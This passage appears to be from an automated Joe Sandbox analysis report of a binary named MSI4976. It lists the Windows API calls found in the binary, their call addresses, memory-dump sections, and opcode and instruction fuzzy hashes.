                                        • Opcode Fuzzy Hash: 34ce661aeeabdde6e0189a092bbde9d06d537bd5e4ea56d4563d72261f240793
                                        • Instruction Fuzzy Hash: 7801D63594412C9BCF03FBA1E8459DD73F9EF14348F1142A5B519DB1D0EA30DB858BA1
                                        APIs
                                        • send.WS2_32(00000000,?,00000000,00000000), ref: 00379534
                                        • WSAGetLastError.WS2_32(00000000,?,00000000,00000000), ref: 00379557
                                        Similarity
                                        • API ID: ErrorLastsend
                                        • String ID:
                                        • API String ID: 1802528911-0
                                        • Opcode ID: c73b3d6d7d24c5cda49354bf14c6ffefc0229ae7b15b04fc878ebec215a13193
                                        • Instruction ID: eac0a3feec61bf90e945d64b8d0de844c83fbe60083e2ca54979ccf2604f5210
                                        • Opcode Fuzzy Hash: c73b3d6d7d24c5cda49354bf14c6ffefc0229ae7b15b04fc878ebec215a13193
                                        • Instruction Fuzzy Hash: B6017C352002009FD715EF28D891B6AB7E9EB99720F10C12AE64ACB391CA71EC01CB90
                                        APIs
                                          • Part of subcall function 0034889E: __getptd_noexit.LIBCMT ref: 0034889E
                                        • __lock_file.LIBCMT ref: 003442B9
                                          • Part of subcall function 00345A9F: __lock.LIBCMT ref: 00345AC2
                                        • __fclose_nolock.LIBCMT ref: 003442C4
                                        Similarity
                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                        • String ID:
                                        • API String ID: 2800547568-0
                                        • Opcode ID: 13605c21fb87c3bee69c1d2a3c6f6308898535d460a0d7733b5a299723143a1e
                                        • Instruction ID: 766f5eab3476edd4e2ccc0d594314735ec62eaff4fcf03c97db47aca5c319ff3
                                        • Opcode Fuzzy Hash: 13605c21fb87c3bee69c1d2a3c6f6308898535d460a0d7733b5a299723143a1e
                                        • Instruction Fuzzy Hash: 86F0B431C01B049BD713AF7588027AE6BD0AF40334F618A19F824AF1C2CBBCB9019F51
                                        APIs
                                        • timeGetTime.WINMM ref: 0033F57A
                                          • Part of subcall function 0032E1F0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0032E279
                                        • Sleep.KERNEL32(00000000), ref: 003975D3
                                        Similarity
                                        • API ID: MessagePeekSleepTimetime
                                        • String ID:
                                        • API String ID: 1792118007-0
                                        • Opcode ID: 9c5844c22338b4b4d85b5ad043222265f0ee920a55dd8a07eebfd6b94a010315
                                        • Instruction ID: 48cc68b42e0ab39260ace3b8830c7a11b035dac2ccd4679f0fbc38551bcf6d25
                                        • Opcode Fuzzy Hash: 9c5844c22338b4b4d85b5ad043222265f0ee920a55dd8a07eebfd6b94a010315
                                        • Instruction Fuzzy Hash: 0CF08C712002249FD356EF69E405B9ABBE8AF5A320F00002AF81ACB651DB70B800CBD0
                                        APIs
                                          • Part of subcall function 003284A6: __swprintf.LIBCMT ref: 003284E5
                                          • Part of subcall function 003284A6: __itow.LIBCMT ref: 00328519
                                        • __wcsnicmp.LIBCMT ref: 003283C4
                                        Similarity
                                        • API ID: __itow__swprintf__wcsnicmp
                                        • String ID:
                                        • API String ID: 712828618-0
                                        • Opcode ID: 4774ebe45454ccd5e61ca601947f7bc710b3c6367f6404d2ed68767689bd55da
                                        • Instruction ID: ac5e6d59eb6c504d38d33410e6edccca0c58dfb09e8381cf4c94b2b63b38044d
                                        • Opcode Fuzzy Hash: 4774ebe45454ccd5e61ca601947f7bc710b3c6367f6404d2ed68767689bd55da
                                        • Instruction Fuzzy Hash: 4FF17C75508312AFC706EF19D89186FBBE5FF98314F54891DF9859B222DB30EA05CB82
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9ca599920e64f453315c057626f71e299ebb78824d6afaa63b8979ad9d3f7f0c
                                        • Instruction ID: 24c9b6a75bfdd0647a9f68585f5207dfec9109f6baf9fe334765e59228c1db1d
                                        • Opcode Fuzzy Hash: 9ca599920e64f453315c057626f71e299ebb78824d6afaa63b8979ad9d3f7f0c
                                        • Instruction Fuzzy Hash: FE61CFB5A046069FCB06DF64C8C1A7AF7E8FF19310F108269E9168B691E730FD91CB91
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dacab9b76aadc0bb8de758e35bfe58fcc1e70a9adc7a6c1960fd066bcf365582
                                        • Instruction ID: 618213dc94873bd5118b070f03fc20ff57ec2c2cfe3c7da2abadeb57d048f0af
                                        • Opcode Fuzzy Hash: dacab9b76aadc0bb8de758e35bfe58fcc1e70a9adc7a6c1960fd066bcf365582
                                        • Instruction Fuzzy Hash: 8D51A135700224AFCF06EF68D992EAD77AAAF49310F158169F9069F392DB30ED01DB50
                                        Similarity
                                        • API ID: _memmove
                                        • String ID:
                                        • API String ID: 4104443479-0
                                        • Opcode ID: 653a53b8435a0736043d6b22074b13ebbbade5d52c540747a625e5d2bf85aa42
                                        • Instruction ID: b33f8cabd20f88e283f01c3791cdc03a70133689827be67f3968da451d460f89
                                        • Opcode Fuzzy Hash: 653a53b8435a0736043d6b22074b13ebbbade5d52c540747a625e5d2bf85aa42
                                        • Instruction Fuzzy Hash: 5741BFB9200612CFC725DF19E491922F7F4FF88360715C42EE99A8BB61D730E851CB50
                                        APIs
                                        • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00324F8F
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: FilePointer
                                        • String ID:
                                        • API String ID: 973152223-0
                                        • Opcode ID: 271674ce134e77719932b1d44ad55efc384180e434e30ea5b1e5cb76ee676c1a
                                        • Instruction ID: 8ba72831b245780e81c96f22b5019dd31ca5282c0977875d81b51f51ba05e657
                                        • Opcode Fuzzy Hash: 271674ce134e77719932b1d44ad55efc384180e434e30ea5b1e5cb76ee676c1a
                                        • Instruction Fuzzy Hash: AB315E31A00625BFCB09CF6CE684AADB7B5BF88310F158629E81997714D770BD90CB90
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: select
                                        • String ID:
                                        • API String ID: 1274211008-0
                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                        • Instruction ID: e564a4544f8f5990036ce73e56b3c3f8b29db690ec04e370e3dba47496c3eb39
                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                        • Instruction Fuzzy Hash: F731E2B0A00106AFC70ADF58C4C0B69FBA6FB59310FA582A5E44ACB655DB30EDC1CB80
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ClearVariant
                                        • String ID:
                                        • API String ID: 1473721057-0
                                        • Opcode ID: 67e2c0190d46fa8b776088bd1824dbc87bc405b747986fd432c745e1a32c3d36
                                        • Instruction ID: 9fddcd79edd422d17fba20443c0e34b1e3145b3606e90260cd69e4029c8d3ffd
                                        • Opcode Fuzzy Hash: 67e2c0190d46fa8b776088bd1824dbc87bc405b747986fd432c745e1a32c3d36
                                        • Instruction Fuzzy Hash: 93415D74504651CFDB2ACF18C494B1ABBE1BF45308F19856CE9964B762C331F885CF52
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID:
                                        • API String ID: 4104443479-0
                                        • Opcode ID: 47012782a030ad8779f94faa8e2b2c96d7a630cd2f65ef253b2984702ea6a323
                                        • Instruction ID: 78a54783d401eb884a19ab5f508c54080a28dd6d634b4aade02a0e7973c12f5c
                                        • Opcode Fuzzy Hash: 47012782a030ad8779f94faa8e2b2c96d7a630cd2f65ef253b2984702ea6a323
                                        • Instruction Fuzzy Hash: EB21E470A00608EBCF169F91FC81A6A7BFDFB56340F21856EE496D9011EB3095D1C755
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID:
                                        • API String ID: 4104443479-0
                                        • Opcode ID: 850a3e34ffcf0575de9322bf5b98585c373294fd89485bbbcd9ce223ec0d444b
                                        • Instruction ID: 00aecfe1920d0a2d3ceb1effffc1634a672fda63520db865bb11216d5926afc9
                                        • Opcode Fuzzy Hash: 850a3e34ffcf0575de9322bf5b98585c373294fd89485bbbcd9ce223ec0d444b
                                        • Instruction Fuzzy Hash: E1114976600601DFD725DF28E581916B7E9FF48320B20882EE98ACB661E732E841CB50
                                        APIs
                                          • Part of subcall function 00323F5D: FreeLibrary.KERNEL32(00000000,?), ref: 00323F90
                                          • Part of subcall function 00344129: __wfsopen.LIBCMT ref: 00344134
                                        • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,003234E2,?,00000001), ref: 00323FCD
                                          • Part of subcall function 00323E78: FreeLibrary.KERNEL32(00000000), ref: 00323EAB
                                          • Part of subcall function 00324010: _memmove.LIBCMT ref: 0032405A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Library$Free$Load__wfsopen_memmove
                                        • String ID:
                                        • API String ID: 1396898556-0
                                        • Opcode ID: 8f0ce1a05a114bda05ae50830160cc0f0015589df0fe2f95fca31c2559c5c4ea
                                        • Instruction ID: 2026cc2a165bc4157e614d6943dfccc9b5b923192ef648d6108dc66e1b18f8ca
                                        • Opcode Fuzzy Hash: 8f0ce1a05a114bda05ae50830160cc0f0015589df0fe2f95fca31c2559c5c4ea
                                        • Instruction Fuzzy Hash: 8411A332610225BACF12AF74FC03FAD76A99F50740F108829F542EF1C1DB74AE459B51
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ClearVariant
                                        • String ID:
                                        • API String ID: 1473721057-0
                                        • Opcode ID: ecd812daf36ae1d3603359d2342f30ef4fbb764cb95cfe52b566ed02b85d4a99
                                        • Instruction ID: 9bda6df19634523b229e6530dcb1fbbb55e266dae41a7ebce74d00d4b051dc1d
                                        • Opcode Fuzzy Hash: ecd812daf36ae1d3603359d2342f30ef4fbb764cb95cfe52b566ed02b85d4a99
                                        • Instruction Fuzzy Hash: 49213974508601CFDB2ADF64C494B1ABBE1BF89304F15496CEA964B632C731E845CF52
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID:
                                        • API String ID: 4104443479-0
                                        • Opcode ID: 3e742b1ba0a0c987c836b15959b7f65b2bcde272eb65e0dd682e5ea94299c368
                                        • Instruction ID: af18919de84ae2fc8627a80a019dfcdc11d9d16a16c519fe34389ab4989245a7
                                        • Opcode Fuzzy Hash: 3e742b1ba0a0c987c836b15959b7f65b2bcde272eb65e0dd682e5ea94299c368
                                        • Instruction Fuzzy Hash: 38010C322066319FC711AF18E881D6BB39CEF44760B14422AF9558B2D1DF31BC218790
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0
                                        • Opcode ID: 8dc8f9b2be8937dbebeb1422f62ac98712d3ff571eaedbd04077ce2e6face332
                                        • Instruction ID: 25c815e6eb8d1377c3278ee6f7eb3f0d69230c772ad4245f15dc47604ea5f5a2
                                        • Opcode Fuzzy Hash: 8dc8f9b2be8937dbebeb1422f62ac98712d3ff571eaedbd04077ce2e6face332
                                        • Instruction Fuzzy Hash: 6A119E363012159FDB12EF18C884ADAB7E9FF49720F0581AAFD4A8F355CB30AD418B91
                                        APIs
                                        • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,00000000,00000000,?,00324E69,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00324CF7
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: 059f42f99779fd8aa19a889310d51772c8ea6281bbf0a7b8ee28155d8fa6d7cf
                                        • Instruction ID: bb4ce3cbb89ec1dc39cf95043059fcc671d6c5ed35e7c29ac30f1f50d72a3b54
                                        • Opcode Fuzzy Hash: 059f42f99779fd8aa19a889310d51772c8ea6281bbf0a7b8ee28155d8fa6d7cf
                                        • Instruction Fuzzy Hash: FE117C31201B64AFD322CF0AD880F66B7E9EF44714F10C42DE59A86A50C771F844CB60
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID:
                                        • API String ID: 4104443479-0
                                        • Opcode ID: 8f18987bb35b2baff0789867a32b92a27879a4fd73e9d049a8f42728d02b6011
                                        • Instruction ID: f9616d14445ae82212f807e8e6035aac5d815bbf0b80b9c6c1626cbde2efde16
                                        • Opcode Fuzzy Hash: 8f18987bb35b2baff0789867a32b92a27879a4fd73e9d049a8f42728d02b6011
                                        • Instruction Fuzzy Hash: E7018FB9200542AFC306EB28D981D39F7A9FF853107548259E429CB702CB30FC22CBE0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID:
                                        • API String ID: 4104443479-0
                                        • Opcode ID: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                                        • Instruction ID: fca55dec7f7c04076d9458cee2104b2c2b7cdfebdd508cddbb2dac6932f1b856
                                        • Opcode Fuzzy Hash: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                                        • Instruction Fuzzy Hash: 0901F9722147016ED7269B39D807A6ABBD8DF447A0F50852EF95ACF1D1EB71E4008A50
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID:
                                        • API String ID: 4104443479-0
                                        • Opcode ID: 02776e319c847e67457d139bf32e2937006cb129a4eaf7d285538e405d1422c3
                                        • Instruction ID: efcd5da6d0e561f5de143c6a86038751a45686e28d9c9e5f8d0cf2fd788226b2
                                        • Opcode Fuzzy Hash: 02776e319c847e67457d139bf32e2937006cb129a4eaf7d285538e405d1422c3
                                        • Instruction Fuzzy Hash: 9001DB39504601EFCB237F29E881E5B7BE89F81370F61453EF8548B651DB31A85187A1
                                        APIs
                                        • CharUpperBuffW.USER32(00000000,?,00000000,?,?,?,00325A39,?,?,?,-00000003,00000000,00000000), ref: 0032514E
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Similarity
                                        • API ID: BuffCharUpper
                                        • API String ID: 3964851224-0
                                        APIs
                                        • WSAStartup.WS2_32(00000202,?), ref: 003795C9
                                        Similarity
                                        • API ID: Startup
                                        • API String ID: 724789610-0
                                        APIs
                                        • FreeLibrary.KERNEL32(?,?,?,?,?,003234E2,?,00000001), ref: 00323E6D
                                        Similarity
                                        • API ID: FreeLibrary
                                        • API String ID: 3664257935-0
                                        APIs
                                        • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00367A11
                                          • Part of subcall function 00327E53: _memmove.LIBCMT ref: 00327EB9
                                        Similarity
                                        • API ID: FolderPath_memmove
                                        • API String ID: 3334745507-0
                                        APIs
                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00321952
                                        Similarity
                                        • API ID: MessageSendTimeout
                                        • API String ID: 1599653421-0
                                        APIs
                                        Similarity
                                        • API ID: TextWindow
                                        • API String ID: 530164218-0
                                        APIs
                                        • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,003949DA,?,?,00000000), ref: 00324FC4
                                        Similarity
                                        • API ID: FilePointer
                                        • API String ID: 973152223-0
                                        APIs
                                        Similarity
                                        • API ID: ClearVariant
                                        • API String ID: 1473721057-0
                                        APIs
                                        Similarity
                                        • API ID: __wfsopen
                                        • API String ID: 197181222-0
                                        APIs
                                        • CloseHandle.KERNEL32(?,?,?,00395950), ref: 0032510C
                                        Similarity
                                        • API ID: CloseHandle
                                        • API String ID: 2962429428-0
                                        APIs
                                          • Part of subcall function 0033AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0033AF8E
                                        • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?,?), ref: 0038F64E
                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0038F6AD
                                        • GetWindowLongW.USER32(?,000000F0), ref: 0038F6EA
                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0038F711
                                        • SendMessageW.USER32 ref: 0038F737
                                        • _wcsncpy.LIBCMT ref: 0038F7A3
                                        • GetKeyState.USER32(00000011), ref: 0038F7C4
                                        • GetKeyState.USER32(00000009), ref: 0038F7D1
                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0038F7E7
                                        • GetKeyState.USER32(00000010), ref: 0038F7F1
                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0038F820
                                        • SendMessageW.USER32 ref: 0038F843
                                        • SendMessageW.USER32(?,00001030,?,0038DE69), ref: 0038F940
                                        • SetCapture.USER32(?), ref: 0038F970
                                        • ClientToScreen.USER32(?,?), ref: 0038F9D4
                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0038F9FA
                                        • ReleaseCapture.USER32 ref: 0038FA05
